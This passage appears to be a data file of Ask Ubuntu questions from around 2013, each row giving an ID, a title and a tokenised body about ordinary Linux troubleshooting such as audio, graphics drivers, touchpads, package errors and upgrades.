cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 1 minspeed = 1 maxspeed = 1.75 accelfactor = 0.166667 trackstickspeed = 40 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 96 edgemotionusealways = 0 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 0 rbcornerbutton = 0 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 0 tapbutton2 = 0 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 0 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 6 verthysteresis = 6 clickpad = 1 rightbuttonarealeft = 0 rightbuttonarearight = 0 rightbuttonareatop = 0 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0
324612	mumble channels	i am running the last version of mumble and i am unable to connect myself to one particular mumble server . it was first setup with the default port 64738 then changed to 66 which allow me now to see the number of users and the ping from this server . the problem is that on my isp connection at home i ca n't see anything else than root . people see me and can talk to me but i ca n't hear them and i ca n't speak with them i have tried many but i still do n't it why it does n't work ... .. i have tried with my cellphone and it worked ... shared it with my computer it worked ... so it got ta be something with my isp or my network .
324615	running processes when machine is suspended	would it be possible to run specific software processes when your machine goes into suspend mode ?
324622	system questions , looking to ditch microsoft	looking to get rid of microsoft , and run a better os . the system specifications below is my media center/server . i have played with xbmc for a while and like it much better than vista media center . i 'm also looking at converting over to linux/ubuntu . do you think this system would be a good fit ? also , the system streams movies , photo 's and music to 4 other pc 's in the house . i am a total novice at linux type os 's . will need a lot of help , and documentation . asus p5qe motherboard intel core 2 duo cpu 3.16ghz 6 gigs of ddr2 pc-800 ram intel ich10r sata ahci controller ( on motherboard ) nvida geforce gtx 650 ti 2gig video card with nvidia hd audio through hdmi to hd 55inch asus dvd burner drw-2014s1t asus blu ray burner bw-12b1st microsoft wireless ( bluetooth ) entertainment keyboard 7000 intellitype pro dual gigabit marvell ethernet sound max integrated digital hd audio lsi mega raid 8888elp pcie x 8 controller , hook to an external 16 drive jbod box with 3 raid 5 arrays without trail and error does anyone know if everything will work with latest version of ubuntu .
324625	ca n't install ubuntu 12.04.2 ( desktop-amd64+mac ) on macbookpro 17 '' mid 2010	i tried everything i could on my macbook pro model : macbookpro6 , intel core i5 , boot rom mbp61.0057.b0f smc 1.57f18 . first i installed refit then i downloaded 'ubuntu-12.04.2-desktop-amd64+mac.iso ' , then converted it into img using hdiutil ( with format udrw ) , then i loaded it into the usb key using dd . after reboot ... nothing . even if i press c , it does n't load , it does n't work even with refit , what 's wrong ? how can i get rid of osx and have my ubuntu running on this machine ?
324626	error when trying to start ubuntu software center	hello my problem is i tried to install google chrome from this site https : //www.google.com/intl/en/chrome/browser/ ? & brand=chma & utm_campaign=en & utm_source=en-ha-na-us-bk & utm_medium=ha when i did i downloaded what i think it the wrong file and now i do n't know what do to do get my software center working when ever i try to start it it does n't work it just closes i 've tired some commands such as sudo apt-get update sudo apt-get upgrade but that did n't work i then tried sudo apt-get install -f and it also did nothing for those to thing i got this error message e : the package google-chrome-stable : i386 needs to be reinstalled , but i ca n't find an archive for it . if someone could help that would be nice i really do n't know what to do i a newbie : c
324628	no microphone input - vizio ct15-a5 and 12.04 lts ( 64 )	i have the vizio ct15-a5 and 12.04 lts ( 64 ) is running smoothly .. only one issue.. i can not record sound or use skype due to lack of mic input . i have tried turning up the sound using the alsa mixer , and tried using pulse audio volume control , but it seems that there is a hardware issue ... it works fine in windows ( dual boot system ) here is the output of lspci -vv 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) subsystem : quanta computer inc device 0922 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 46 region 0 : memory at f7d10000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel i also tried adding the following to `` /etc/modprobe.d/alsa-base.conf '' but to no avail : options snd_hda_intel model=laptop options snd-hda-intel position_fix=1 enable=yes yes , i even tried the weird front-right channel disabling , but to no avail . here is a copy of my original alsa-base.conf # autoloader aliases install sound-slot-0 /sbin/modprobe snd-card-0 install sound-slot-1 /sbin/modprobe snd-card-1 install sound-slot-2 /sbin/modprobe snd-card-2 install sound-slot-3 /sbin/modprobe snd-card-3 install sound-slot-4 /sbin/modprobe snd-card-4 install sound-slot-5 /sbin/modprobe snd-card-5 install sound-slot-6 /sbin/modprobe snd-card-6 install sound-slot-7 /sbin/modprobe snd-card-7 # cause optional modules to be loaded above generic modules install snd /sbin/modprobe -- ignore-install snd $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-ioctl32 ; /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # # workaround at bug # 499695 ( reverted in ubuntu see lp # 319505 ) install snd-pcm /sbin/modprobe -- ignore-install snd-pcm $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-pcm-oss ; : ; } install snd-mixer /sbin/modprobe -- ignore-install snd-mixer $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-mixer-oss ; : ; } install snd-seq /sbin/modprobe -- ignore-install snd-seq $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; /sbin/modprobe -- quiet -- use-blacklist snd-seq-oss ; : ; } # install snd-rawmidi /sbin/modprobe -- ignore-install snd-rawmidi $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq-midi ; : ; } # cause optional modules to be loaded above sound card driver modules install snd-emu10k1 /sbin/modprobe -- ignore-install snd-emu10k1 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-emu10k1-synth ; } install snd-via82xx /sbin/modprobe -- ignore-install snd-via82xx $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist snd-seq ; } # load saa7134-alsa instead of saa7134 ( which gets dragged in by it anyway ) install saa7134 /sbin/modprobe -- ignore-install saa7134 $ cmdline_opts & & { /sbin/modprobe -- quiet -- use-blacklist saa7134-alsa ; : ; } # prevent abnormal drivers from grabbing index 0 options bt87x index=-2 options cx88_alsa index=-2 options saa7134-alsa index=-2 options snd-atiixp-modem index=-2 options snd-intel8x0m index=-2 options snd-via82xx-modem index=-2 options snd-usb-audio index=-2 options snd-usb-caiaq index=-2 options snd-usb-ua101 index=-2 options snd-usb-us122l index=-2 options snd-usb-usx2y index=-2 # ubuntu # 62691 , enable mpu for snd-cmipci options snd-cmipci mpu_port=0x330 fm_port=0x388 # keep snd-pcsp from being loaded as first soundcard options snd-pcsp index=-2 # keep snd-usb-audio from beeing loaded as first soundcard options snd-usb-audio index=-2
324630	a different terminal	when i first started using amazon aws when you sshed to a aws server running ubuntu you would get a cool shell that had server status at the bottom and a few other cool features . i am working on a server now and would love to know how to add this to my server . does anyone know what i am talking about ? ?
324631	ubuntu 12.04 will not use cloud archive packages	i 'm trying to get keystone installed on my ubuntu 12.04 from the cloud archive and it keeps installed the package from precise-updates . here 's what apt-cache madison keystone reveals . root @ cloud : /etc/puppet # apt-cache madison keystone keystone | 1:2013.1.2-0ubuntu2~cloud0 | http : //ubuntu-cloud.archive.canonical.com/ubuntu/ precise-updates/grizzly/main amd64 packages keystone | 2012.1.3+stable-20130423-f48dd0fc-0ubuntu1.1 | http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages keystone | 2012.1.3+stable-20130423-f48dd0fc-0ubuntu1.1 | http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages keystone | 2012.1-0ubuntu1 | http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages keystone | 2012.1-0ubuntu1 | http : //us.archive.ubuntu.com/ubuntu/ precise/main sources keystone | 2012.1.3+stable-20130423-f48dd0fc-0ubuntu1.1 | http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main sources keystone | 2012.1.3+stable-20130423-f48dd0fc-0ubuntu1.1 | http : //security.ubuntu.com/ubuntu/ precise-security/main sources keystone | 1:2013.1.2-0ubuntu2~cloud0 | http : //ubuntu-cloud.archive.canonical.com/ubuntu/ precise-updates/grizzly/main sources but when i apt-get install keystone i get this version : 2012.1.3+stable-20130423-f48dd0fc-0ubuntu1.1 instead of the expected 1:2013.1.2-0ubuntu2~cloud0 . i suspect i must be doing something wrong , but i ca n't figure out what . i 'm trying to build up a puppet manifest to automate this and need to figure out how to ensure the apt installs the expected version when the cloud archive is enabled .
324632	im new to ubuntu and need a quick help	i have 1 24gb ssd and a 750gb regular drive , and when i install ubuntu to my ssd then my other drive is separate . i would like to install ubuntu so that my computer recognises both my ssd and regular drive the same , is there any way to do this when installing ubuntu . any help is appreciated . thank you
324636	catalyst on ubuntu 13.04 hybrid graphics supporting dual screen ?	anyone made double screen configuration works on ubuntu 13.04 using catalyst ? i followed this guide how do i get amd/intel hybrid graphics drivers to work ? i have tried several drivers ( the latest beta and the latest stable ones ) - did not succeed . everything works until i turn on the second monitor . after that just flickering . if anybody has the working configuration , please , let me know .
324647	how to print the line number when searching for a string in multiple files	i would like to know a handy command to search for some strings in multiple plain text files and show the line number where it matchs in the output . ie : grep -r 'hello ' -- include=*.js 多 ? output : base.js [ 4 ] base.js [ 13 ] utils.js [ 27 ] ... thanks !
324651	why does my shell script only execute in execution mode `` display output '' ?	i wrote a bash script ( here ) for extracting exif gps coordinates from an image and displaying those coordinates as a pointer in google maps . it works perfectly when used like this in the terminal : gui=1 ./show_location_in_chrome.sh /path/to/image.jpg i have added a right-click command to nautilus using nautilus-actions with these settings : path : gui=1 /home/tomas/show_location_in_chrome.sh parameters : % f basename filter : *.jpg but when i right-click a jpeg file and click the menu item , nothing happens . the only exception is when the `` execution mode '' is set to `` display output '' , in which case the script works as intended . unfortunately nautilus also displays a large window with script output that i have to manually close every time . how do i figure out why the script does n't work in any other execution mode than `` display output '' ? please comment if i can provide any more specific information . the `` run command '' displayed in the command output is : /bin/sh -c 'gui=1 /home/tomas/show_location_in_chrome.sh '\ '' /home/tomas/dropbox/camera up loads/2013-07-21 14.58.33.jpg'\ '' ' edit : i have added # ! /usr/bin/env bash to the top of my script and removed the explicit call to bash in the `` path '' setting . it changed nothing . edit : i added echo `` works '' > ~/test.txt to the top of the script ( below the shebang ) , then clicked the menu item . no files were added to my home folder , so i have concluded that the script is n't even being executed when the execution mode is anything other than `` display output '' .
324653	clarifying the claim of `` full ubuntu desktop os '' support on the ubuntu edge	can anyone clarify what canonical means when creating a `` full ubuntu desktop os '' on the proposed ubuntu edge ? my definition of a `` full ubuntu desktop os '' is if a software package can be complied for ubuntu 13.04 the ubuntu 13.04 os on the ubuntu edge will attempt to run said software if in desktop mode . i say attempt as any desktop can fail to run correctly compiled software but they will all attempt to run the software . does my definition of a `` full ubuntu desktop os '' match canonical 's definition ?
324655	the process of updating a `` normal release '' ?	i was amazed to see 13.04 `` just work '' when it came to getting my wireless internet up and running . not sure if it was the firmware or the drivers or just having a very up-to-date linux kernel ... but i digress . the short term support concerns me a little . am i going to need to keep a spindle of cd/dvd 's with me at all times to always be updating ( every 6 months or so ) ? is it possible to update cleanly without having to completely wipe out my existing install ? is there any way to go from 13.04 to 13.10 ( or any future releases ) purely through updates , as opposed to completely replacing the operating system ? thanks guys !
324656	installing and running firefox using kubuntu	i keep trying to download and install firefox . the ark archive manager comes on . i then extract the file but all it does it give me the individual componets but i 'm still unable to either open or run firefox . i need explicit instructions of what to do , should i save the file when prompted or do i open with ark ? and if i open with ark , what steps do i need to take to actually get firefox installed and running ?
324657	gnome/gdm not starting	note : while working through my issue and documenting it i discovered the solution , but have decided to post this in case another person has the same/similar issue ( see bottom ) ... after uninstalling the pulseaudio equalizer and rebooting , i have lost my desktop ( gnome ) . upon powering up the ubuntu start-up screen displays ... then a generic login screen appears , and after logging in , i only get a terminal window ... see : http : //www.locusplex.us/images/screenshots.jpg i am running ubuntu 10.04 lts lucid on a dell latitude 13 . i have tried : ~ $ sudo startx which returns : fatal server error : server is already active for display 0 if the server is no longer running , remove /tmp/.x0-lock and start again removing the file : ~ $ sudo rm /tmp/.x0-lock and trying ( 'startx ' ) again yields : _xservtranssocketunixcreatelistener : ... socketcreatelistener ( ) failed _xservtransmakea11cotsserverlistenerrs : server already running fatal server error : can not establish any listening sockets - make sure the x server is n't already running after stopping/starting the x server : ~ $ sudo stop gdm ~ $ gdm stop/waiting ~ $ sudo start gdm i am taken back to the login screen like before ( see image above ) . stopping the server again ( 'sudo stop gdm ' ) then trying : ~ $ sudo startx again yields : _xservtranssocketunixcreatelistener : ... socketcreatelistener ( ) failed _xservtransmakea11cotsserverlistenerrs : server already running fatal server error : can not establish any listening sockets - make sure the x server is n't already running i have searched multiple forums , including ask ubuntu and found a few related threads : gdm killed at startup i have attempted the suggestions there with : sudo apt-get install -f -m -- reinstall -u gdm the log reports : 0 upgraded , 0 newly installed , 1 reinstalled , 0 to remove and 0 not upgraded do you want to continue [ y/n ] y a bit more logging and end with : setting up gdm ( 2.30.2 is.2.30.0-0ubuntu5.2 ... next per the suggestion : ~ $ sudo dpkg-reconfigure gdm ~ $ sudo reboot then i find myself back at the previously described login screen .
324659	how to replace missing icons with another icon-pack ?	is there a way to replace missing icons with icons in another pack we prefer instead of hi-color that ubuntu uses by default ?
324667	( 13.04 ) no laptop speaker output on hp envy dv7 quad core edition	recently , i decided to use ubuntu as a work related os . i was impressed with its overall performance and its simplicity ( yes , ubuntu is simple to me ) . everything was working great until i found out that my sound card wo n't output any audio through the laptop speakers . if i use headphones , it works fine , but without them , no audio . i am using an hp dv7 quad core edition ( 2013 ) . i have configured the speakers , tried maximizing the volume settings , still with no speaker output . all that it reads on the audio device selection panel is `` speakers ; built-in audio '' my question is , is there a way to fix this issue ? if not , when will it be available ? are there any drivers that should be available ? for proprietary drivers ( additional drivers tab ) , there are n't any drivers available , the list is just blank . here is a list of running devices if helpful . bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 138a:0018 validity sensors , inc . bus 001 device 004 : id 0bda:58d8 realtek semiconductor corp .
324675	how to increase laptop resolution with nvidia optimus ?	i use ubuntu 12.04 64 bits . i use bumblebee with nvidia-current and install success . i found that when i run some program , i ca n't see its board . how to increase resolution ? thank you~
324677	my touchpad and keyboard in labptop is notworking in ubuntu 13.04	i am using dell inspiron n5110 , in this touch pad and keyboard is not working in ubuntu 13.04 , but it is perfectly working in the window
324683	installing linux ubuntu on sony vaio sve151a11w laptop	how to get sony vaio sve151a11w work with linux ubuntu ? i tried installing it but it shows some grpahics problem and does n't work . any help would be much appreciated .
324685	how to route all internet traffic through tor ( the onion router ) ?	could you explain how to route all internet traffic through tor ? i am using ubuntu i really do n't know how to do it . actually i am using tor for twitter only , and i 'm afraid of dns leak . so i need to route everything through tor .
324687	unable to upgrade to newest version of ubunty from 12.10	trying to upgrade to newest ubuntu from 12.10 . the update manager says failed to download repository information . check your internet connection i checked my internet connection ( s ) , and i 'm connected both wired and wireless . so i click on the details of the update manager and get the following text : w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
324691	e4defrag - what does output mean ?	e4defrag shows many lines like ( filename ) 100 % [ ok ] or ( filename ) 0 % [ ng ] , and at finish shows success/failures . does ng mean it was not moved , ok means it was defragmented ? what are the failures ?
324692	how do i install libreoffice impress without installing libreoffice draw ?	askubuntu users : i 'm a new user of the forum , i would like you to help me with this little problem : i have a desktop computer with lubuntu raring ringtail 13.04 . it runs pretty well , but this linux distro includes some software that i do n't use at all , such like the one with the problem : libreoffice draw . i do n't know how to uninstall it properly . i 've tried the synaptic ( and apt-get purge ) way but ( both of them ) said that i have to unistall libreoffice impress in order to unistall draw , and i do n't want to do it because i use impress for school homework a lot . i would like you to give me some ideas about how to unistall libreoffice draw without uninstalling impress . i 'll be waiting your answers , gabriel from venezuela .
324694	opengl warning not in mesa table	i am running ubuntu 13.04 on a virtual machine . my host is windows 7 64 bit machine i7-2630qm nvidia geforce gtx 460m graphics i have installed opengl , glut and mesa onto my linux os in the virtual machine . when i made a test opengl program it compiles fine , when i run the program i get the following warnings and a segmentation fault . opengl warning : glflushvertexarrayrangenv not found in mesa table opengl warning : glvertexarrayrangenv not found in mesa table opengl warning : glcombinerinputnv not found in mesa table opengl warning : glcombineroutputnv not found in mesa table opengl warning : glcombinerparameterfnv not found in mesa table opengl warning : glcombinerparameterfvnv not found in mesa table opengl warning : glcombinerparameterinv not found in mesa table opengl warning : glcombinerparameterivnv not found in mesa table opengl warning : glfinalcombinerinputnv not found in mesa table opengl warning : glgetcombinerinputparameterfvnv not found in mesa table opengl warning : glgetcombinerinputparameterivnv not found in mesa table opengl warning : glgetcombineroutputparameterfvnv not found in mesa table opengl warning : glgetcombineroutputparameterivnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterfvnv not found in mesa table opengl warning : glgetfinalcombinerinputparameterivnv not found in mesa table opengl warning : gldeletefencesnv not found in mesa table opengl warning : glfinishfencenv not found in mesa table opengl warning : glgenfencesnv not found in mesa table opengl warning : glgetfenceivnv not found in mesa table opengl warning : glisfencenv not found in mesa table opengl warning : glsetfencenv not found in mesa table opengl warning : gltestfencenv not found in mesa table opengl warning : xgetvisualinfo returned 0 visuals for 0xf77250 opengl warning : retry with 0x8002 returned 0 visuals segmentation fault ( core dumped ) does anyone know if this is a bug due to a missing driver ? i noticed at least one other person that has posted online in a similar situation as i am but still no response edit : guest additions website : opengl on linux requires kernel 2.6.27 and higher as well as x.org server version 1.5 and higher . ubuntu 10.10 and fedora 14 have been tested and confirmed as working . my current x.org server version : -virtualbox : ~/workspace/c++/chapter_8 $ x -version x.org x server 1.13.3 release date : 2013-03-07 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic x86_64 ubuntu current operating system : linux marco-virtualbox 3.8.0-26-generic # 38-ubuntu smp mon jun 17 21:43:33 utc 2013 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.8.0-26-generic root=uuid=e9e83a17-def0-4c1a-8da1-86dbaa5c1658 ro quiet splash vt.handoff=7 build date : 17 april 2013 10:43:13pm xorg-server 2:1.13.3-0ubuntu6 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.28.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . my current kernel : -virtualbox : ~/workspace/c++/chapter_8 $ uname -r 3.8.0-26-generic i am not sure if my x.org server version is 1.5 though ... .
324697	properly configuring clickpad in samsung new series 9 - np900x4c	i just bought a samsung np900x4c , installed ubuntu 13.04 and i noticed the clickpad started to behave very erratically ( mostly moving the mouse whenever i tried to click anywhere ) . i googled a bit and i found this configuration file , which seemed to be for the 12.04 version - so i did n't tried it . then i came across this gist - it came up during a google search , i have no idea what ubuntu version it is for but , judging by the identifier , it seems more specific to my laptop . i copied its contents to /usr/share/x11/xorg.conf.d/52-np900x4c-clickpad.conf and restarted the system - the results were not as good as windows so i also tried switching the following commented lines : # option `` horizhysteresis '' `` 17 '' # option `` verthysteresis '' `` 17 '' option `` horizhysteresis '' `` 6 '' option `` verthysteresis '' `` 6 '' i have n't noticed any significant change . the mouse movement while i click is mostly gone but i ca n't help being bugged by a couple of other erratic behaviors , such as : whenever my fingertip is resting on the click ( bottom ) area the mouse does n't move the speed at which the cursor moves seems a tad slow ( like it was running out of fps ) it 's my first time with clickpads and i have no idea which settings to tweak in ubuntu . i saw this other answer , which seems to suggest areabottomedge is the way to go , but i 'm really not sure if that is true - and if it is what values to put in there . this is the output of my synclient command : leftedge = 130 rightedge = 3130 topedge = 123 bottomedge = 2159 fingerlow = 5 fingerhigh = 15 fingerpress = 48 maxtaptime = 360 maxtapmove = 20 maxdoubletaptime = 180 singletaptimeout = 360 clicktime = 30 fasttaps = 1 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 30 horizscrolldelta = 30 vertedgescroll = 0 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 7 accelfactor = 0.1 trackstickspeed = 0 edgemotionminz = 30 edgemotionmaxz = 160 edgemotionminspeed = 1 edgemotionmaxspeed = 318 edgemotionusealways = 0 touchpadoff = 2 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 0 clickfinger1 = 1 clickfinger2 = 1 clickfinger3 = 1 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 1 palmminwidth = 10 palmminz = 40 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 0 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 17 verthysteresis = 17 clickpad = 1 rightbuttonarealeft = 1950 rightbuttonarearight = 0 rightbuttonareatop = 1900 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0 please note that the above was copied after removing the 52-np900x4c-clickpad.conf file ( without restarting after that , however ) . can someone help me get this working correctly ?
324701	non-fatal boot automount errors generated after adding ntfs partition to fstab	i had a problem mounting an ntfs partition using pysdm that 's discussed here - ca n't mount ntfs partition without root access i resolved it by the fstab edits suggested . however , i now get an `` error mount 0 - skip or fix now ? '' ( paraphrased from memory ) message on startup . `` skip '' boots normally and everything mounts correctly . i have found these messages in the kernel log - 26/07/13 11:27:25 ext4-fs ( sda6 ) warning : maximal mount count reached , running e2fsck is recommended 26/07/13 11:27:25 ext4-fs ( sda6 ) mounted filesystem with ordered data mode . opts : ( null ) this is my current /etc/fstab - # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda8 during installation uuid= [ id # # # ] / ext4 errors=remount-ro 0 1 # swap was on /dev/sda7 during installation uuid= [ id # # # ] none swap sw 0 0 /dev/sda5 /media/data ntfs nls=iso8859-1 , rw , umask=000 , user 0 0 /dev/sda6 /media/ext4-data ext4 defaults 0 0 this is the only part i manually edited - nls=iso8859-1 , rw , umask=000 , user 0 0 this line is residue from pysdm - /dev/sda5 /media/data ntfs did i cause this error or is there some configurable mount setting i am unaware of ? edit : this is screencap of fstab showing the split line for sda5 - http : //oi42.tinypic.com/6nywcx.jpg
324703	pulseaudio not monitoring any audio output ( i.e. , projectm can not work properly )	i 've got an acer aspire timelinex 3830tg with lubuntu 12.10 . sound is working ok with all programs , but projectm visualization is not . in pulseaudio preferences i can choose the analog or digital output ( being the digital the hdmi plug , i guess ) . when selecting the former ( so i can hear music from the speakers ) there are no output levels registered , neither in the volume controls nor in the playback meter , so projectm is doing nothing , although the sound is there . if i change the output device to the digital output everything is working fine . any suggestion ? cheers .
324705	first full backup on usb : permission denied	i am new to ubuntu 13.04 . i am trying to do a full backup to my usb and i have used gparted to create a partition on my usb and formatted it as ext4 . it still has permission denied errors . i get this message : permission denied when trying to create â/media/stacyjane/ubuntu backup/duplicity-full.20130726t043854z.vol1.difftar.gpg
324709	how to print to directly to a wireless printer	networkprintingwithubuntu describes how to handle `` network printing '' : to another ubuntu or windows machine that has a printer attached i just want to print directly to a wireless printer not via a print sever .
324710	ubuntu update sign	i get this red sign on top saying that i must update manually due to network problems . when i click on show updates i get the software on this computer is up to date and i click ok , but the red sign will not go away . when i restart the computer it is gone but reappears in a few minutes . how can i remove this red warning ?
324713	can ubuntustudio compose music ( e.g . play guitar then auto write notation note )	can ubuntustudio software can compose music ( e.g . play guitar via audio input then auto write notation note ) ? or is there any software can compose music in linux ?
324718	filter .txt file on descending order of created date	i had created a .txt file but now i forgot where i save it and also the file name of it . so my question is : is there any method to filter out .txt files on descending order of created date ? i 'm currently using ubuntu 12.04 on 32 bits .
324725	getting command-not-found working under zsh	i 'm trying to get the command-not-found feature under ubuntu to work under zsh , without luck : â ~ pdfunite zsh : command not found : pdfunite â ~ bash u @ ub : ~ $ pdfunite the program 'pdfunite ' is currently not installed . you can install it by typing : sudo apt-get install poppler-utils does anyone know if there is a package available that also supports zsh ? thank you .
324728	ubuntu live usb	i want to run ubuntu via usb without installing it to my hard disk . how do i install additional drivers , and all my aps related to ubuntu in usb ? how do i get back up of all the softwares which i installed during my first run . so i can use those softwares in all the system via usb live ? i need to use that additional software on other computer with ubuntu via usb live ? please give me solutions for this . i am a new linux user . please give me a all procedures for this . i am not good in ubuntu .
324733	how to enable the radeon dynamic power management feature ?	so recently , the rc 's of linux kernel 3.11 were released . as you may know , this new kernel comes with dynamic power management for users of the open source radeon driver . since i have power management issues with the default kernel of ubuntu 13.04 , i wanted to try this out . doe someone know how to enable this new feature after i downloaded and installed the latest kernel rc from the kernel testing ppa ? edit : more specifically , i am talking about this : http : //www.phoronix.com/scan.php ? page=news_item & px=mtm5nje
324735	repair package catalogue in ubuntu 12.04 due to pidgin facebook chat plugin	i tried to install facebook chat plugins for pidgin , and the package was broken . so , now i ca n't install or remove any package . the software center is showing repair package catalog dialogue . i tried to run dpkg -- configure -a , the following is the output : dpkg : dependency problems prevent configuration of pidgin-facebookchat : pidgin-data ( 1:2.10.3-0ubuntu1.3 ) breaks pidgin-facebookchat ( < < 1.69-2 ) and is installed . version of pidgin-facebookchat to be configured is 1.69. dpkg : error processing pidgin-facebookchat ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : pidgin-facebookchat what should i do to repair the problem ? please help .
324741	matlab for ubuntu 12.04	i have matlab for windows , can i use the same and install in ubuntu ? thanks , raj
324751	how do i install 12.04 ?	i 'm running 10.04 and want to upgrade . i 've downloaded 12.04 to my machine ( not a disc ) and ca n't get it installed . how do i get it installed ?
324755	unable to detect graphics card in 12.04 lts	hi i just recently installed ubuntu onto my laptop ( dell inspiron 15r 5520 64-bit ) alongside windows 8 . while ubuntu 12.04.2 lts seems to be working fine otherwise , in system settings it is unable to detect my graphics card and shows as `` unknown '' . i tried the following commands and this is what i get : $ lspci -v | grep -i vga 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( prog-if 00 [ vga controller ] ) i have the ati one as far as i know , so what 's with the intel vga being displayed ? ? secondly , in system settings > additional hardware i activated the ati/amd proprietary fglrx graphics driver ( post-release updates ) . the thing downloaded and installed itself and but it shows as `` the driver is activated but not currently in use '' . i do n't really know what that means . after some digging around , i tried the following commands as well but to no avail : sudo apt-get purge fglrx* sudo apt-get install fglrx sudo aticonfig -- initial next i went to the amd site and downloaded the requisite driver from here i followed the steps in their instruction manual , used the following command again : sudo apt-get remove -- purge fglrx fglrx_* fglrx-amdcccle* fglrx-dev* and then went to the folder where i had download the driver and ran the installation file . i went through the setup process , did : /usr/bin/aticonfig and rebooted my laptop . still i am stuck at square one , however , my hardware info now shows the ati vga driver in addition to an intel one . here are the names : -pci devices- vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) vga compatible controller : advanced micro devices , inc. [ amd/ati ] thames [ radeon hd 7500m/7600m series ] ( prog-if 00 [ vga controller ] ) after i installed the downloaded ati driver and checked system settings > additional drivers , i see that the raedon vgas have been deactivated again , as shown : here is a link to the /var/log/xorg.0.log . hope all this info helps . please help me detect my graphics card , i need it for dozens of applications specially compiz effects , games etc . i am a novice so kindly explain your answers as far as possible so that i can make the best of of them . thanks in advance : )
324756	ubuntu .pam_environment for non-login shell	i remember in the past , we have two place to set env variables for ubuntu login shell - ~/.profile non login shell - ~/.bashrc but now according to the doc [ 1 ] , they are not recommended anymore . and we should use ~/.pam_environment , but my understanding is this is for login shell , so how about non login shell ? where should i use ? [ 1 ] https : //help.ubuntu.com/community/environmentvariables
324762	torrent client with multi-trackers support ( not command-line )	i 'm looking for a torrent client that supports multi-trackers like utorrent does . i 'm trying qbittorent , i open a magnet link with it and it works ok but if i add more magnet links from other trackers it does not add those trackers to the previous ones , i always have to do it by myself doing `` add new tracker '' and copying the udp link . i 'm also not sure that it 's using all the trackers i added . is there any graphic program like utorrent that handles multi-trackers ? thanks
